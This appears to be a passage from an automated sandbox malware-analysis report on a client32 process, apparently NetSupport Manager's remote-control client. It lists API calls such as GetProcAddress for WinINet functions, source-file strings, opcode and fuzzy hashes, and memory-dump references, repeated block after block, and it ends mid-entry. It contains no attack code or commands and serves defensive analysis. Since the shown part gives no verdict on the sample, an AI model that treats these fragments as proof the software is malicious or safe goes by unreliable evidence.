                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CreateErrorEventExitLastMessageProcesswsprintf
                                                                                                                                                                                                    • String ID: ..\ctl32\Connect.cpp$event
                                                                                                                                                                                                    • API String ID: 3621156866-397488498
                                                                                                                                                                                                    • Opcode ID: 7ee51be79d2020efe90e3a8a1d42f47f495943fc8ed238146bfeafd279e8fead
                                                                                                                                                                                                    • Instruction ID: 1e179fcce89b41eecb28e868e3bc3d371cf40be5e8a1825c7246c0f04d2a5f7d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7ee51be79d2020efe90e3a8a1d42f47f495943fc8ed238146bfeafd279e8fead
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 02115AB5A04715AFD720CF59C841B5AFBE8EB44B14F008A6AF8259B780DBB5A6048B90
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InvalidateRect.USER32(00000000,?,00000000), ref: 11079143
                                                                                                                                                                                                      • Part of subcall function 11076CD0: GetClientRect.USER32(?,?), ref: 11076D09
                                                                                                                                                                                                      • Part of subcall function 11076CD0: SetRect.USER32(?,00000001,00000001,0000000C,0000000C), ref: 11076D35
                                                                                                                                                                                                      • Part of subcall function 11076CD0: InvalidateRect.USER32(?,?,?,?,?), ref: 11076DA9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • m_hWnd, xrefs: 1107912C
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11079127
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Rect$Invalidate$Client
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 3698213978-2830328467
                                                                                                                                                                                                    • Opcode ID: b5ee6c1b061cbe50bfcfeb966dab852632c0ff4c39803aea79d638f30cdc88e6
                                                                                                                                                                                                    • Instruction ID: dc93f9b9db06cc5834772539f873ec566fe60ae0c75361ab6d4a815b93365837
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b5ee6c1b061cbe50bfcfeb966dab852632c0ff4c39803aea79d638f30cdc88e6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C113971F0021AAFCB04CF98D985FAEF3B5EB44314F1080A9E545AB241EB75A944CBA4
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InvalidateRect.USER32(00000000,?,00000000), ref: 11079143
                                                                                                                                                                                                      • Part of subcall function 11076CD0: GetClientRect.USER32(?,?), ref: 11076D09
                                                                                                                                                                                                      • Part of subcall function 11076CD0: SetRect.USER32(?,00000001,00000001,0000000C,0000000C), ref: 11076D35
                                                                                                                                                                                                      • Part of subcall function 11076CD0: InvalidateRect.USER32(?,?,?,?,?), ref: 11076DA9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • m_hWnd, xrefs: 1107912C
                                                                                                                                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11079127
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Rect$Invalidate$Client
                                                                                                                                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                                                                    • API String ID: 3698213978-2830328467
                                                                                                                                                                                                    • Opcode ID: f1fc1da89fd49b4448f7976360b5958bbd35e6d8b5c43bd0696d4afb5a966bed
                                                                                                                                                                                                    • Instruction ID: 40633be3568182781611e9f9c5f3781e51ba646c780b44c564ce4a8b334c72e6
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f1fc1da89fd49b4448f7976360b5958bbd35e6d8b5c43bd0696d4afb5a966bed
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF115A71F0021A9FCB04CF98D981FAEF3B5EB44314F108068E505AB241EB75A9508BA4
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085295170.00000000689B0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085459790.00000000689F9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085581340.0000000068A00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: wvsprintf
                                                                                                                                                                                                    • String ID: NSMString.cpp$pszBuffer[1024]==0
                                                                                                                                                                                                    • API String ID: 2795597889-2173072673
                                                                                                                                                                                                    • Opcode ID: c07c5eb438fd6e5b0ed8ba07bc9f52f22a8efa641163fac9d9c927247200867a
                                                                                                                                                                                                    • Instruction ID: 74a44d6fe3848af6e311ed735175a899c075d8dc316734cb039219f258a27e88
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c07c5eb438fd6e5b0ed8ba07bc9f52f22a8efa641163fac9d9c927247200867a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6BF0A975A04108ABDF04DBA4DD00AFE77BC9B85208F804099EA45A7240DB31AE4587A6
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • wvsprintfA.USER32(?,11190240,?), ref: 110CF052
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                                                                                                                                    • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                                                                                                                                                    • API String ID: 175691280-2052047905
                                                                                                                                                                                                    • Opcode ID: 843686aa2f927784df5d34851f1b2d246bec5263db3ff1548cbc46b3f5e79cea
                                                                                                                                                                                                    • Instruction ID: ac41a9a0db9df06f4d8a16ffcac00abdbc7d2a047ef6ca5be1778eb271469bd1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 843686aa2f927784df5d34851f1b2d246bec5263db3ff1548cbc46b3f5e79cea
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A8F0A479A0412D7BDB40DAA8DC40BEEFBBD9B45A04F4040EDEA45A7240DF306E498BA5
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085295170.00000000689B0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085459790.00000000689F9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085581340.0000000068A00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: wvsprintf
                                                                                                                                                                                                    • String ID: NSMString.cpp$pszBuffer[1024]==0
                                                                                                                                                                                                    • API String ID: 2795597889-2173072673
                                                                                                                                                                                                    • Opcode ID: 36e4f149f9fea15c705cd93385c8ac4d70ad7377a33fd8069afb8f6ae326bb18
                                                                                                                                                                                                    • Instruction ID: 571d632469397096bf579e18f2a91d5cc27263487fa79aa263c6d1f5190227c2
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 36e4f149f9fea15c705cd93385c8ac4d70ad7377a33fd8069afb8f6ae326bb18
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E7F0C875A0010CBBCB04DF98DD40BFEBBBC9F85208F448099FA09A7140DB30AE46C7A6
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • wvsprintfA.USER32(?,?,1102C131), ref: 110CF0CB
                                                                                                                                                                                                      • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                                                                                      • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                                                                                      • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                                                                                      • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorExitLastMessageProcesswsprintfwvsprintf
                                                                                                                                                                                                    • String ID: ..\CTL32\NSMString.cpp$pszBuffer[1024]==0
                                                                                                                                                                                                    • API String ID: 175691280-2052047905
                                                                                                                                                                                                    • Opcode ID: 70cf3e41058d91624f0f5df427f2462c6048bde8c60f5ed02ea0bbe19daebabd
                                                                                                                                                                                                    • Instruction ID: b1f8247c4ebfb1806b65041ddde5ed66821e01f400e323cd5dcc56784af5e4be
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 70cf3e41058d91624f0f5df427f2462c6048bde8c60f5ed02ea0bbe19daebabd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 89F0A475A0012DBBDB50DA98DC80BEEFFAC9B45604F1040A9EA09A7140DF306A45C7A5
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetOpenA), ref: 689B4B04
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078), ref: 689B4B31
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085295170.00000000689B0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085459790.00000000689F9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085581340.0000000068A00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressErrorLastProc
                                                                                                                                                                                                    • String ID: InternetOpenA
                                                                                                                                                                                                    • API String ID: 199729137-3658917949
                                                                                                                                                                                                    • Opcode ID: 7ceda3459f565595f122113e045b2a80b3d75de89e6e5b9e2ceef6d2e0d8499c
                                                                                                                                                                                                    • Instruction ID: 3501b2481c93eea39dc12c20fb5be6e7192df23c3af9d398346fece44e2a1482
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7ceda3459f565595f122113e045b2a80b3d75de89e6e5b9e2ceef6d2e0d8499c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6CF030B2604218AFC714DFA5E844E5B77ACEF88715F008519FA09D7200D770E810DFA0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 689B4BA4
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078,000000C8,?,689BB53C,00000000,0000002B,?,?), ref: 689B4BCD
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70085335143.00000000689B1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 689B0000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085295170.00000000689B0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085417905.00000000689F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085459790.00000000689F9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085499162.00000000689FE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70085581340.0000000068A00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_689b0000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressErrorLastProc
                                                                                                                                                                                                    • String ID: InternetQueryOptionA
                                                                                                                                                                                                    • API String ID: 199729137-3310327128
                                                                                                                                                                                                    • Opcode ID: 1d8d0fb66dbcbe1e5011d13831847992cc98e07885eeb43eed704b309dfd1173
                                                                                                                                                                                                    • Instruction ID: fed5ee8bd6bfe4ba6c695217cc6a340950c58b9cd63b1c7a3a6fc9ca419e307f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d8d0fb66dbcbe1e5011d13831847992cc98e07885eeb43eed704b309dfd1173
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BEF05872648628AFC764CF94E984E9B77ACEF88721F40481AF946D7640C770F850DBA0
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(1117B47B,InternetReadFile), ref: 110274D4
                                                                                                                                                                                                    • SetLastError.KERNEL32(00000078,00000000,?,1102976A,1117B47B,00000000,1102C191,?), ref: 110274FD
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000000B.00000002.70084176258.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084139269.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084497298.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084583311.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084622394.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000000B.00000002.70084657688.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AddressErrorLastProc
                                                                                                                                                                                                    • String ID: InternetReadFile
                                                                                                                                                                                                    • API String ID: 199729137-1824561397
                                                                                                                                                                                                    • Opcode ID: 25f72b9f5038b89ec4964a80f4b93fd200d2d05303f84e90b96401370639f8e8
                                                                                                                                                                                                    • Instruction ID: 7102dc40746974abd302d7ecd2b68d0a8047dc71c6fa1f41d10cf5a704a59d5e
